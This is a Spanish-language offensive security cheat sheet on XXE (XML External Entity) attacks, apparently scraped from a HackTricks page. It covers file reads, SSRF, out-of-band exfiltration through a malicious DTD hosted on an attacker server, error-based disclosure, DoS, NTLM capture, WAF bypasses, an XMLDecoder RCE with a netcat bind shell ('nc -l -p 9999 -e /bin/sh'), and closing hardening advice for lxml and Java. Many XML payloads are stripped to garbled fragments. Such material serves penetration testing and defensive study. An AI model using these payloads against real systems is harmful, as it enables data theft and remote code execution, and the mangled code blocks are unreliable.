XXE Test Blog

# XXE - XEE - XML External Entity {{#include ../banners/hacktricks-training.md}} ## Fundamentos de XML XML es un lenguaje de marcado diseñado para el almacenamiento y transporte de datos, con una estructura flexible que permite el uso de etiquetas nombradas descriptivamente. Se diferencia de HTML al no estar limitado a un conjunto de etiquetas predefinidas. La importancia de XML ha disminuido con el auge de JSON, a pesar de su papel inicial en la tecnología AJAX. - **Representación de Datos a través de Entidades**: Las entidades en XML permiten la representación de datos, incluidos caracteres especiales como `<` y `>`, que corresponden a `<` y `>` para evitar conflictos con el sistema de etiquetas de XML. - **Definición de Elementos XML**: XML permite la definición de tipos de elementos, delineando cómo deben estructurarse los elementos y qué contenido pueden contener, que va desde cualquier tipo de contenido hasta elementos hijos específicos. - **Definición de Tipo de Documento (DTD)**: Los DTD son cruciales en XML para definir la estructura del documento y los tipos de datos que puede contener. Pueden ser internos, externos o una combinación, guiando cómo se formatean y validan los documentos. - **Entidades Personalizadas y Externas**: XML admite la creación de entidades personalizadas dentro de un DTD para una representación de datos flexible. Las entidades externas, definidas con una URL, plantean preocupaciones de seguridad, particularmente en el contexto de ataques de XML External Entity (XXE), que explotan la forma en que los analizadores XML manejan fuentes de datos externas: ` ]>` - **Detección de XXE con Entidades de Parámetro**: Para detectar vulnerabilidades XXE, especialmente cuando los métodos convencionales fallan debido a medidas de seguridad del analizador, se pueden utilizar entidades de parámetro XML. Estas entidades permiten técnicas de detección fuera de banda, como activar búsquedas DNS o solicitudes HTTP a un dominio controlado, para confirmar la vulnerabilidad. - ` ]>` - ` ]>` ## Principales ataques [**La mayoría de estos ataques fueron probados utilizando los increíbles laboratorios XEE de Portswiggers: https://portswigger.net/web-security/xxe**](https://portswigger.net/web-security/xxe) ### Prueba de Nueva Entidad En este ataque voy a probar si una simple declaración de NUEVA ENTIDAD está funcionando. ```xml ]> &toreplace; 1 ``` ![](<../images/image (870).png>) ### Leer archivo Intentemos leer `/etc/passwd` de diferentes maneras. Para Windows, podrías intentar leer: `C:\windows\system32\drivers\etc\hosts` En este primer caso, ten en cuenta que SYSTEM "_**file:///**etc/passwd_" también funcionará. ```xml ]> &example; ``` ![](<../images/image (86).png>) Este segundo caso debería ser útil para extraer un archivo si el servidor web está utilizando PHP (No es el caso de los laboratorios de Portswigger) ```xml ]> &example; ``` En este tercer caso, observa que estamos declarando el `Element stockCheck` como ANY. ```xml ]> &file; 1 ``` ![](<../images/image (753).png>) ### Listado de directorios En aplicaciones basadas en **Java**, podría ser posible **listar el contenido de un directorio** a través de XXE con una carga útil como (solo pidiendo el directorio en lugar del archivo): ```xml &xxe; ]>&xxe; ``` ### SSRF Un XXE podría ser utilizado para abusar de un SSRF dentro de una nube. ```xml ]> &xxe;1 ``` ### Blind SSRF Usando la **técnica comentada anteriormente** puedes hacer que el servidor acceda a un servidor que controlas para mostrar que es vulnerable. Pero, si eso no funciona, tal vez sea porque **las entidades XML no están permitidas**, en ese caso podrías intentar usar **entidades de parámetros XML**: ```xml %xxe; ]> 3;1 ``` ### "Blind" SSRF - Exfiltrar datos fuera de banda **En esta ocasión vamos a hacer que el servidor cargue un nuevo DTD con una carga útil maliciosa que enviará el contenido de un archivo a través de una solicitud HTTP (para archivos de varias líneas podrías intentar exfiltrarlo a través de \_ftp://**\_ usando este servidor básico como ejemplo [**xxe-ftp-server.rb**](https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb)**). Esta explicación se basa en** [**Portswiggers lab aquí**](https://portswigger.net/web-security/xxe/blind)**.** En el DTD malicioso dado, se llevan a cabo una serie de pasos para exfiltrar datos: ### Ejemplo de DTD Malicioso: La estructura es la siguiente: ```xml "> %eval; %exfiltrate; ``` Los pasos ejecutados por este DTD incluyen: 1. **Definición de Entidades de Parámetro:** - Se crea una entidad de parámetro XML, `%file`, que lee el contenido del archivo `/etc/hostname`. - Se define otra entidad de parámetro XML, `%eval`. Esta declara dinámicamente una nueva entidad de parámetro XML, `%exfiltrate`. La entidad `%exfiltrate` está configurada para realizar una solicitud HTTP al servidor del atacante, pasando el contenido de la entidad `%file` dentro de la cadena de consulta de la URL. 2. **Ejecución de Entidades:** - Se utiliza la entidad `%eval`, lo que lleva a la ejecución de la declaración dinámica de la entidad `%exfiltrate`. - Luego se usa la entidad `%exfiltrate`, lo que desencadena una solicitud HTTP a la URL especificada con el contenido del archivo. El atacante aloja este DTD malicioso en un servidor bajo su control, típicamente en una URL como `http://web-attacker.com/malicious.dtd`. **Carga Útil XXE:** Para explotar una aplicación vulnerable, el atacante envía una carga útil XXE: ```xml %xxe;]> 3;1 ``` Este payload define una entidad de parámetro XML `%xxe` e incorpora esta entidad dentro del DTD. Cuando es procesado por un analizador XML, este payload obtiene el DTD externo del servidor del atacante. El analizador luego interpreta el DTD en línea, ejecutando los pasos descritos en el DTD malicioso y llevando a la exfiltración del archivo `/etc/hostname` al servidor del atacante. ### Basado en Errores (DTD Externo) **En este caso, vamos a hacer que el servidor cargue un DTD malicioso que mostrará el contenido de un archivo dentro de un mensaje de error (esto solo es válido si puedes ver mensajes de error).** [**Ejemplo de aquí.**](https://portswigger.net/web-security/xxe/blind) Un mensaje de error de análisis XML, que revela el contenido del archivo `/etc/passwd`, puede ser desencadenado utilizando un Documento Tipo de Definición (DTD) externo malicioso. Esto se logra a través de los siguientes pasos: 1. Se define una entidad de parámetro XML llamada `file`, que contiene el contenido del archivo `/etc/passwd`. 2. Se define una entidad de parámetro XML llamada `eval`, incorporando una declaración dinámica para otra entidad de parámetro XML llamada `error`. Esta entidad `error`, cuando se evalúa, intenta cargar un archivo inexistente, incorporando el contenido de la entidad `file` como su nombre. 3. Se invoca la entidad `eval`, lo que lleva a la declaración dinámica de la entidad `error`. 4. La invocación de la entidad `error` resulta en un intento de cargar un archivo inexistente, produciendo un mensaje de error que incluye el contenido del archivo `/etc/passwd` como parte del nombre del archivo. El DTD externo malicioso puede ser invocado con el siguiente XML: ```xml %xxe;]> 3;1 ``` Al ejecutar, la respuesta del servidor web debería incluir un mensaje de error que muestre el contenido del archivo `/etc/passwd`. ![](<../images/image (809).png>) _**Por favor, note que el DTD externo nos permite incluir una entidad dentro del segundo `eval`), pero está prohibido en el DTD interno. Por lo tanto, no se puede forzar un error sin usar un DTD externo (usualmente).**_ ### **Error Basado (DTD del sistema)** ¿Y qué pasa con las vulnerabilidades XXE ciegas cuando **las interacciones fuera de banda están bloqueadas** (las conexiones externas no están disponibles)? Una laguna en la especificación del lenguaje XML puede **exponer datos sensibles a través de mensajes de error cuando el DTD de un documento mezcla declaraciones internas y externas**. Este problema permite la redefinición interna de entidades declaradas externamente, facilitando la ejecución de ataques XXE basados en errores. Tales ataques explotan la redefinición de una entidad de parámetro XML, originalmente declarada en un DTD externo, desde dentro de un DTD interno. Cuando las conexiones fuera de banda son bloqueadas por el servidor, los atacantes deben confiar en archivos DTD locales para llevar a cabo el ataque, con el objetivo de inducir un error de análisis para revelar información sensible. Considere un escenario donde el sistema de archivos del servidor contiene un archivo DTD en `/usr/local/app/schema.dtd`, definiendo una entidad llamada `custom_entity`. Un atacante puede inducir un error de análisis XML revelando el contenido del archivo `/etc/passwd` al enviar un DTD híbrido de la siguiente manera: ```xml "> %eval; %error; '> %local_dtd; ]> ``` Los pasos descritos se ejecutan mediante este DTD: - La definición de una entidad de parámetro XML llamada `local_dtd` incluye el archivo DTD externo ubicado en el sistema de archivos del servidor. - Ocurre una redefinición para la entidad de parámetro XML `custom_entity`, originalmente definida en el DTD externo, para encapsular un [error-based XXE exploit](https://portswigger.net/web-security/xxe/blind#exploiting-blind-xxe-to-retrieve-data-via-error-messages). Esta redefinición está diseñada para provocar un error de análisis, exponiendo el contenido del archivo `/etc/passwd`. - Al emplear la entidad `local_dtd`, se activa el DTD externo, abarcando la `custom_entity` recién definida. Esta secuencia de acciones precipita la emisión del mensaje de error buscado por el exploit. **Ejemplo del mundo real:** Los sistemas que utilizan el entorno de escritorio GNOME a menudo tienen un DTD en `/usr/share/yelp/dtd/docbookx.dtd` que contiene una entidad llamada `ISOamso`. ```xml "> %eval; %error; '> %local_dtd; ]> 3;1 ``` ![](<../images/image (625).png>) Como esta técnica utiliza un **DTD interno, primero necesitas encontrar uno válido**. Podrías hacer esto **instalando** el mismo **SO / Software** que está utilizando el servidor y **buscando algunos DTDs predeterminados**, o **obteniendo una lista** de **DTDs predeterminados** dentro de los sistemas y **verificando** si alguno de ellos existe: ```xml %local_dtd; ]> ``` Para más información, consulta [https://portswigger.net/web-security/xxe/blind](https://portswigger.net/web-security/xxe/blind) ### Encontrando DTDs dentro del sistema En el siguiente increíble repositorio de github puedes encontrar **rutas de DTDs que pueden estar presentes en el sistema**: {{#ref}} https://github.com/GoSecure/dtd-finder/tree/master/list {{#endref}} Además, si tienes la **imagen de Docker del sistema víctima**, puedes usar la herramienta del mismo repositorio para **escanear** la **imagen** y **encontrar** la ruta de los **DTDs** presentes dentro del sistema. Lee el [Readme del github](https://github.com/GoSecure/dtd-finder) para aprender cómo. ```bash java -jar dtd-finder-1.2-SNAPSHOT-all.jar /tmp/dadocker.tar Scanning TAR file /tmp/dadocker.tar [=] Found a DTD: /tomcat/lib/jsp-api.jar!/jakarta/servlet/jsp/resources/jspxml.dtd Testing 0 entities : [] [=] Found a DTD: /tomcat/lib/servlet-api.jar!/jakarta/servlet/resources/XMLSchema.dtd Testing 0 entities : [] ``` ### XXE a través de analizadores de Office Open XML Para una explicación más detallada de este ataque, **consulta la segunda sección de** [**este increíble post**](https://labs.detectify.com/2021/09/15/obscure-xxe-attacks/) **de Detectify**. La capacidad de **subir documentos de Microsoft Office es ofrecida por muchas aplicaciones web**, que luego proceden a extraer ciertos detalles de estos documentos. Por ejemplo, una aplicación web puede permitir a los usuarios importar datos subiendo una hoja de cálculo en formato XLSX. Para que el analizador extraiga los datos de la hoja de cálculo, inevitablemente necesitará analizar al menos un archivo XML. Para probar esta vulnerabilidad, es necesario crear un **archivo de Microsoft Office que contenga una carga útil XXE**. El primer paso es crear un directorio vacío al que se pueda descomprimir el documento. Una vez que el documento ha sido descomprimido, el archivo XML ubicado en `./unzipped/word/document.xml` debe ser abierto y editado en un editor de texto preferido (como vim). El XML debe ser modificado para incluir la carga útil XXE deseada, a menudo comenzando con una solicitud HTTP. Las líneas XML modificadas deben ser insertadas entre los dos objetos XML raíz. Es importante reemplazar la URL con una URL monitorizable para las solicitudes. Finalmente, el archivo puede ser comprimido para crear el archivo malicioso poc.docx. Desde el directorio "descomprimido" creado previamente, se debe ejecutar el siguiente comando: Ahora, el archivo creado puede ser subido a la aplicación web potencialmente vulnerable, y se puede esperar que aparezca una solicitud en los registros de Burp Collaborator. ### Jar: protocolo El **protocolo jar** es accesible exclusivamente dentro de **aplicaciones Java**. Está diseñado para permitir el acceso a archivos dentro de un **archivo PKZIP** (por ejemplo, `.zip`, `.jar`, etc.), atendiendo tanto a archivos locales como remotos. ``` jar:file:///var/myarchive.zip!/file.txt jar:https://download.host.com/myarchive.zip!/file.txt ``` > [!CAUTION] > Para poder acceder a archivos dentro de archivos PKZIP es **súper útil para abusar de XXE a través de archivos DTD del sistema.** Consulta [esta sección para aprender cómo abusar de archivos DTD del sistema](xxe-xee-xml-external-entity.md#error-based-system-dtd). El proceso para acceder a un archivo dentro de un archivo PKZIP a través del protocolo jar implica varios pasos: 1. Se realiza una solicitud HTTP para descargar el archivo zip desde una ubicación especificada, como `https://download.website.com/archive.zip`. 2. La respuesta HTTP que contiene el archivo se almacena temporalmente en el sistema, típicamente en una ubicación como `/tmp/...`. 3. Luego, se extrae el archivo para acceder a su contenido. 4. Se lee el archivo específico dentro del archivo, `file.zip`. 5. Después de la operación, se eliminan cualquier archivo temporal creado durante este proceso. Una técnica interesante para interrumpir este proceso en el segundo paso implica mantener la conexión del servidor abierta indefinidamente al servir el archivo del archivo. Las herramientas disponibles en [este repositorio](https://github.com/GoSecure/xxe-workshop/tree/master/24_write_xxe/solution) se pueden utilizar para este propósito, incluyendo un servidor Python (`slow_http_server.py`) y un servidor Java (`slowserver.jar`). ```xml ]> &xxe; ``` > [!CAUTION] > Escribir archivos en un directorio temporal puede ayudar a **escalar otra vulnerabilidad que involucra un recorrido de ruta** (como inclusión de archivos locales, inyección de plantillas, RCE de XSLT, deserialización, etc). ### XSS ```xml script]]>alert(1)/script]]> ``` ### DoS #### Ataque de Mil Millones de Risas ```xml ]> &a4; ``` #### Ataque Yaml ```xml a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"] b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a] c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b] d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c] e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d] f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e] g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f] h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] ``` #### Ataque de Explosión Cuadrática ![](<../images/image (527).png>) #### Obtener NTML En hosts de Windows, es posible obtener el hash NTML del usuario del servidor web configurando un manejador de responder.py: ```bash Responder.py -I eth0 -v ``` y enviando la siguiente solicitud ```xml ]> &example; ``` Luego puedes intentar descifrar el hash usando hashcat ## Superficies XXE Ocultas ### XInclude Al integrar datos del cliente en documentos XML del lado del servidor, como los de solicitudes SOAP en el backend, el control directo sobre la estructura XML a menudo es limitado, lo que dificulta los ataques XXE tradicionales debido a las restricciones para modificar el elemento `DOCTYPE`. Sin embargo, un ataque `XInclude` proporciona una solución al permitir la inserción de entidades externas dentro de cualquier elemento de datos del documento XML. Este método es efectivo incluso cuando solo se puede controlar una parte de los datos dentro de un documento XML generado por el servidor. Para ejecutar un ataque `XInclude`, se debe declarar el espacio de nombres `XInclude`, y se debe especificar la ruta del archivo para la entidad externa deseada. A continuación se muestra un ejemplo sucinto de cómo se puede formular tal ataque: ```xml productId=&storeId=1 ``` Consulta [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe) para más información! ### SVG - Carga de Archivos Los archivos subidos por los usuarios a ciertas aplicaciones, que luego son procesados en el servidor, pueden explotar vulnerabilidades en cómo se manejan los formatos de archivo XML o que contienen XML. Formatos de archivo comunes como documentos de oficina (DOCX) e imágenes (SVG) se basan en XML. Cuando los usuarios **suben imágenes**, estas imágenes son procesadas o validadas del lado del servidor. Incluso para aplicaciones que esperan formatos como PNG o JPEG, la **biblioteca de procesamiento de imágenes del servidor también podría soportar imágenes SVG**. SVG, al ser un formato basado en XML, puede ser explotado por atacantes para enviar imágenes SVG maliciosas, exponiendo así al servidor a vulnerabilidades XXE (XML External Entity). Un ejemplo de tal explotación se muestra a continuación, donde una imagen SVG maliciosa intenta leer archivos del sistema: ```xml ``` Otro método implica intentar **ejecutar comandos** a través del envoltorio "expect" de PHP: ```xml ``` En ambos casos, se utiliza el formato SVG para lanzar ataques que explotan las capacidades de procesamiento XML del software del servidor, destacando la necesidad de una validación de entrada robusta y medidas de seguridad. ¡Consulta [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe) para más información! **Nota: la primera línea del archivo leído o del resultado de la ejecución aparecerá DENTRO de la imagen creada. Así que necesitas poder acceder a la imagen que SVG ha creado.** ### **PDF - Carga de archivos** Lee la siguiente publicación para **aprender cómo explotar un XXE subiendo un archivo PDF**: {{#ref}} file-upload/pdf-upload-xxe-and-cors-bypass.md {{#endref}} ### Content-Type: De x-www-urlencoded a XML Si una solicitud POST acepta los datos en formato XML, podrías intentar explotar un XXE en esa solicitud. Por ejemplo, si una solicitud normal contiene lo siguiente: ```xml POST /action HTTP/1.0 Content-Type: application/x-www-form-urlencoded Content-Length: 7 foo=bar ``` Entonces podrías enviar la siguiente solicitud, con el mismo resultado: ```xml POST /action HTTP/1.0 Content-Type: text/xml Content-Length: 52 bar ``` ### Content-Type: De JSON a XEE Para cambiar la solicitud, podrías usar una extensión de Burp llamada “**Content Type Converter**“. [Aquí](https://exploitstube.com/xxe-for-fun-and-profit-converting-json-request-to-xml.html) puedes encontrar este ejemplo: ```xml Content-Type: application/json;charset=UTF-8 {"root": {"root": { "firstName": "Avinash", "lastName": "", "country": "United States", "city": "ddd", "postalCode": "ddd" }}} ``` ```xml Content-Type: application/xml;charset=UTF-8 ]> &xxe; United States ddd ddd ``` Otro ejemplo se puede encontrar [aquí](https://medium.com/hmif-itb/googlectf-2019-web-bnv-writeup-nicholas-rianto-putra-medium-b8e2d86d78b2). ## Bypasses de WAF y Protecciones ### Base64 ```xml %init; ]> ``` Esto solo funciona si el servidor XML acepta el protocolo `data://`. ### UTF-7 Puedes usar la \[**"Receta de Codificación"** de cyberchef aquí ]\(\[[https://gchq.github.io/CyberChef/index.html#recipe=Encode_text%28'UTF-7](https://gchq.github.io/CyberChef/#recipe=Encode_text%28'UTF-7) %2865000%29'%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4)to]\([https://gchq.github.io/CyberChef/index.html#recipe=Encode_text%28'UTF-7 %2865000%29'%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to](https://gchq.github.io/CyberChef/#recipe=Encode_text%28%27UTF-7%20%2865000%29%27%29&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to)) para transformar a UTF-7. ```xml +ADw-+ACE-DOCTYPE+ACA-foo+ACA-+AFs-+ADw-+ACE-ENTITY+ACA-example+ACA-SYSTEM+ACA-+ACI-/etc/passwd+ACI-+AD4-+ACA-+AF0-+AD4-+AAo-+ADw-stockCheck+AD4-+ADw-productId+AD4-+ACY-example+ADs-+ADw-/productId+AD4-+ADw-storeId+AD4-1+ADw-/storeId+AD4-+ADw-/stockCheck+AD4- ``` ```xml +ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4 +ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+ +ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4 ``` ### File:/ Protocol Bypass Si la web está usando PHP, en lugar de usar `file:/` puedes usar **php wrappers**`php://filter/convert.base64-encode/resource=` para **acceder a archivos internos**. Si la web está usando Java, puedes verificar el [**jar: protocol**](xxe-xee-xml-external-entity.md#jar-protocol). ### HTML Entities Truco de [**https://github.com/Ambrotd/XXE-Notes**](https://github.com/Ambrotd/XXE-Notes)\ Puedes crear una **entidad dentro de una entidad** codificándola con **html entities** y luego llamarla para **cargar un dtd**.\ Ten en cuenta que las **HTML Entities** utilizadas deben ser **numéricas** (como \[en este ejemplo]\([https://gchq.github.io/CyberChef/index.html#recipe=To_HTML_Entity%28true,'Numeric entities'%29\&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)\\]()). ```xml %a;%dtd;]> &exfil; ``` Ejemplo de DTD: ```xml "> %abt; %exfil; ``` ## PHP Wrappers ### Base64 **Extraer** _**index.php**_ ```xml ]> ``` #### **Extraer recurso externo** ```xml ]> ``` ### Ejecución remota de código **Si el módulo "expect" de PHP está cargado** ```xml ]> &xxe; mypass ``` ## **SOAP - XEE** ```xml %dtd;]>]]> ``` ## XLIFF - XXE Este ejemplo está inspirado en [https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe](https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe) XLIFF (Formato de Intercambio de Archivos de Localización XML) se utiliza para estandarizar el intercambio de datos en procesos de localización. Es un formato basado en XML utilizado principalmente para transferir datos localizables entre herramientas durante la localización y como un formato de intercambio común para herramientas de CAT (Traducción Asistida por Computadora). ### Análisis de Solicitud Ciega Se realiza una solicitud al servidor con el siguiente contenido: ```xml ------WebKitFormBoundaryqBdAsEtYaBjTArl3 Content-Disposition: form-data; name="file"; filename="xxe.xliff" Content-Type: application/x-xliff+xml %remote; ]> ------WebKitFormBoundaryqBdAsEtYaBjTArl3-- ``` Sin embargo, esta solicitud provoca un error interno del servidor, mencionando específicamente un problema con las declaraciones de marcado: ```json { "status": 500, "error": "Internal Server Error", "message": "Error systemId: http://redacted.burpcollaborator.net/?xxe_test; The markup declarations contained or pointed to by the document type declaration must be well-formed." } ``` A pesar del error, se registra un acierto en Burp Collaborator, lo que indica algún nivel de interacción con la entidad externa. Exfiltración de Datos Fuera de Banda Para exfiltrar datos, se envía una solicitud modificada: ``` ------WebKitFormBoundaryqBdAsEtYaBjTArl3 Content-Disposition: form-data; name="file"; filename="xxe.xliff" Content-Type: application/x-xliff+xml %remote; ]> ------WebKitFormBoundaryqBdAsEtYaBjTArl3-- ``` Este enfoque revela que el User Agent indica el uso de Java 1.8. Una limitación notable de esta versión de Java es la incapacidad de recuperar archivos que contengan un carácter de nueva línea, como /etc/passwd, utilizando la técnica Out of Band. Exfiltración de Datos Basada en Errores Para superar esta limitación, se emplea un enfoque basado en errores. El archivo DTD está estructurado de la siguiente manera para provocar un error que incluya datos de un archivo objetivo: ```xml "> %foo; %xxe; ``` El servidor responde con un error, reflejando importantemente el archivo no existente, indicando que el servidor está intentando acceder al archivo especificado: ```javascript {"status":500,"error":"Internal Server Error","message":"IO error.\nReason: /nofile (No such file or directory)"} ``` Para incluir el contenido del archivo en el mensaje de error, se ajusta el archivo DTD: ```xml "> %foo; %xxe; ``` Esta modificación conduce a la exfiltración exitosa del contenido del archivo, ya que se refleja en la salida de error enviada a través de HTTP. Esto indica un ataque XXE (XML External Entity) exitoso, aprovechando tanto técnicas Out of Band como Error-Based para extraer información sensible. ## RSS - XEE XML válido con formato RSS para explotar una vulnerabilidad XXE. ### Ping back Solicitud HTTP simple al servidor del atacante. ```xml /rssXXE" >]> XXE Test Blog http://example.com/ XXE Test Blog Mon, 02 Feb 2015 00:00:00 -0000 &xxe; http://example.com Test Post author@example.com Mon, 02 Feb 2015 00:00:00 -0000 ``` ### Leer archivo ```xml ]> The Blog http://example.com/ A blog about things Mon, 03 Feb 2014 00:00:00 -0000 &xxe; http://example.com a post author@example.com Mon, 03 Feb 2014 00:00:00 -0000 ``` ### Leer código fuente Usando el filtro base64 de PHP ```xml ]> The Blog http://example.com/ A blog about things Mon, 03 Feb 2014 00:00:00 -0000 &xxe; http://example.com a post author@example.com Mon, 03 Feb 2014 00:00:00 -0000 ``` ## Java XMLDecoder XEE a RCE XMLDecoder es una clase de Java que crea objetos basados en un mensaje XML. Si un usuario malicioso puede hacer que una aplicación use datos arbitrarios en una llamada al método **readObject**, obtendrá instantáneamente ejecución de código en el servidor. ### Usando Runtime().exec() ```xml

``` ### ProcessBuilder ```xml /usr/bin/nc -l -p 9999 -e /bin/sh ``` ## XXE + WrapWrap + Lightyear + bypasses Echa un vistazo a este increíble informe [https://swarm.ptsecurity.com/impossible-xxe-in-php/](https://swarm.ptsecurity.com/impossible-xxe-in-php/) ## Tools {{#ref}} https://github.com/luisfontes19/xxexploiter {{#endref}} ### Python lxml Parameter-Entity XXE (Divulgación de Archivos Basada en Errores) > [!INFO] > La biblioteca de Python **lxml** utiliza **libxml2** en su interior. Las versiones anteriores a **lxml 5.4.0 / libxml2 2.13.8** aún expanden las entidades *parameter* incluso cuando `resolve_entities=False`, haciéndolas accesibles cuando la aplicación habilita `load_dtd=True` y/o `resolve_entities=True`. Esto permite cargas útiles de XXE Basadas en Errores que incrustan el contenido de archivos locales en el mensaje de error del analizador. #### 1. Explotando lxml < 5.4.0 1. Identificar o crear un DTD *local* en el disco que defina una entidad de parámetro **no definida** (por ejemplo, `%config_hex;`). 2. Crear un DTD interno que: * Cargue el DTD local con ``. * Redefina la entidad no definida para que: - Lea el archivo objetivo (``). - Construya otra entidad de parámetro que se refiera a una **ruta inválida** que contenga el valor `%flag;` y desencadene un error del analizador (`">`). 3. Finalmente, expandir `%local_dtd;` y `%eval;` para que el analizador encuentre `%error;`, no pueda abrir `/aaa/` y filtre la bandera dentro de la excepción lanzada, que a menudo es devuelta al usuario por la aplicación. ```xml "> %eval;'> %local_dtd; ]> ``` Cuando la aplicación imprime la excepción, la respuesta contiene: ``` Error : failed to load external entity "file:///aaa/FLAG{secret}" ``` > [!TIP] > Si el analizador se queja sobre los caracteres `%`/`&` dentro del subconjunto interno, codifícalos dos veces (`%` ⇒ `%`) para retrasar la expansión. #### 2. Eludir el endurecimiento de lxml 5.4.0 (libxml2 aún vulnerable) `lxml` ≥ 5.4.0 prohíbe entidades de parámetros *error* como la anterior, pero **libxml2** aún permite que se incrusten en una entidad *general*. El truco es: 1. Leer el archivo en una entidad de parámetro `%file`. 2. Declarar otra entidad de parámetro que construya una entidad **general** `c` cuyo identificador SYSTEM use un *protocolo inexistente* como `meow://%file;`. 3. Colocar `&c;` en el cuerpo XML. Cuando el analizador intenta desreferenciar `meow://…`, falla y refleja la URI completa – incluidos los contenidos del archivo – en el mensaje de error. ```xml "> '> %a; %b; ]> &c; ``` #### Conclusiones clave * **Las entidades de parámetro** aún se expanden por libxml2 incluso cuando `resolve_entities` debería bloquear XXE. * Una **URI inválida** o un **archivo inexistente** son suficientes para concatenar datos controlados en la excepción lanzada. * La técnica funciona **sin conectividad saliente**, lo que la hace ideal para entornos con filtrado de salida estricto. #### Orientación de mitigación * Actualice a **lxml ≥ 5.4.0** y asegúrese de que la **libxml2** subyacente sea **≥ 2.13.8**. * Desactive `load_dtd` y/o `resolve_entities` a menos que sea absolutamente necesario. * Evite devolver errores de analizador en bruto al cliente. ### Ejemplo de endurecimiento de Java DocumentBuilderFactory Las aplicaciones Java frecuentemente analizan XML usando `DocumentBuilderFactory`. Por defecto, la fábrica **permite la resolución de entidades externas**, lo que la hace vulnerable a XXE y SSRF si no se establecen banderas de endurecimiento adicionales: ```java DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); DocumentBuilder builder = dbf.newDocumentBuilder(); // XXE-prone ``` Ejemplo de configuración segura: ```java DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); // Completely forbid any DOCTYPE declarations (best-effort defence) dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); // Disable expansion of external entities dbf.setFeature("http://xml.org/sax/features/external-general-entities", false); dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false); // Enable "secure processing" which applies additional limits dbf.setFeature(javax.xml.XMLConstants.FEATURE_SECURE_PROCESSING, true); // Defensive extras dbf.setXIncludeAware(false); dbf.setExpandEntityReferences(false); DocumentBuilder builder = dbf.newDocumentBuilder(); ``` Si la aplicación debe admitir DTDs internamente, mantenga `disallow-doctype-decl` deshabilitado pero **siempre** deje las dos características `external-*-entities` configuradas en `false`. La combinación previene cargas útiles clásicas de divulgación de archivos (`file:///etc/passwd`) así como vectores SSRF basados en red (`http://169.254.169.254/…`, protocolo `jar:`, etc.). Estudio de caso del mundo real: **CVE-2025-27136** en el emulador Java S3 *LocalS3* utilizó el constructor vulnerable mostrado arriba. Un atacante no autenticado podría suministrar un cuerpo XML manipulado al endpoint `CreateBucketConfiguration` y hacer que el servidor incruste archivos locales (por ejemplo, `/etc/passwd`) en la respuesta HTTP. ### XXE en JMF/Servicios de Orquestación de Impresión → SSRF Algunas plataformas de flujo de trabajo/orquestación de impresión exponen un oyente de Formato de Mensajería de Trabajo (JMF) orientado a la red que acepta XML a través de TCP. Si el analizador subyacente acepta un `DOCTYPE` y resuelve entidades externas, puede aprovechar un XXE clásico para forzar al servidor a realizar solicitudes salientes (SSRF) o acceder a recursos locales. Puntos clave observados en la naturaleza: - Oyente de red (por ejemplo, cliente JMF) en un puerto dedicado (comúnmente 4004 en Xerox FreeFlow Core). - Análisis XML basado en Java dentro de un jar (por ejemplo, `jmfclient.jar`) sin `disallow-doctype-decl` o resolución de entidades deshabilitada. - Las llamadas fuera de banda confirman de manera confiable la explotación. Sonda SSRF mínima estilo JMF (la estructura varía según el producto, pero el DOCTYPE es lo que importa): ```xml ]> &probe; ``` Notas: - Reemplace la URL de la entidad con su colaborador. Si SSRF es posible, el servidor lo resolverá mientras analiza el mensaje. - Endurecimientos a buscar: `disallow-doctype-decl=true`, `external-general-entities=false`, `external-parameter-entities=false`. - Incluso cuando el puerto JMF no sirva archivos, SSRF puede encadenarse para reconocimiento interno o para acceder a APIs de gestión vinculadas a localhost. Referencias para este vector se enumeran al final de la página. ## Referencias - [OffSec Blog – CVE-2025-27136 LocalS3 XXE](https://www.offsec.com/blog/cve-2025-27136/) - [https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf](https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf) - [https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html](https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html) - Extraer información a través de HTTP utilizando su propio DTD externo: 